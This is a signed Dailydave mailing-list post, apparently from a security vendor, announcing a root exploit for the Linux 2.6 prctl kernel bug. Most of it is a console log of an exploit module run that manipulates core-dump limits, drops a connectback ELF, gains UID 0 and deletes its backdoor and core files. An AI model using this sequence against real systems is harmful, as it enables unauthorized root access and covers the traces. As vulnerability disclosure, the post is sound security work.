DSU

[Dave Aitel <dave () immunityinc com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So the 2.6 prctl kernel bug is exploitable to get root. Typically on
these sorts of things, you just read what Paul Starzets has to say on
the matter and accept it. But for people who are having problems
believing it, we posted an exploit to the partner's page about it.

This is the difference between Linux and Windows. If this had been
Microsoft they would have just changed the behavior silently or made it
part of some other patch and hoped no one noticed.

Example commandline usage on Linux MOSDEF node:

Linux/MOSDEF$ runmodule DSU -v0 -t127.0.0.1
[C] Running module: DSU

[C] Args: -v0 -t127.0.0.1
Loading DSU ...
 [ ok ]
[C] ID: 0 Setinfo: > DSU (in progress) <
[C] prctl ok.
[C] RLIMIT_CORE before: [0L, 4294967295L]
[C] setrlimit result: 0
[C] RLIMIT_CORE after: [8192L, 8192L]
[C] prctl ok.
[C] chdir ok.
[C] connectback ELF size: 2998
[C] file wrote successfully
[C] strcpy ok.
[C] fork result: 4830
[C] kill worked.
[C] Segmentation fault (core dumped)
[C] waiting
[C] ROOOOOOOOOOOOOOOOOOT
[C] Self.fd=4
[C] Set up Linux dynamic linking assembly component server
Initialized sendint with fd=4
[C] Initialized Local Functions.
[C] Resetting signal handlers...
[C] Reset sigchild
[C] Getting UIDs
[C] backdoor file removed.
[C] coredump file removed.
[C] Done.
[C] ID: 0 Setinfo: > DSU Done <
[C] UID=0 EUID=0 GID=0 EGID=0
Linux/MOSDEF#
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)

iD8DBQFEs65UtehAhL0gheoRAqKiAJ474oO9zHkiil6o+FTS3TyCXnvBoQCffnsO
pbPHnGmcYZCtlzOsks33bFQ=
=K+xP
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave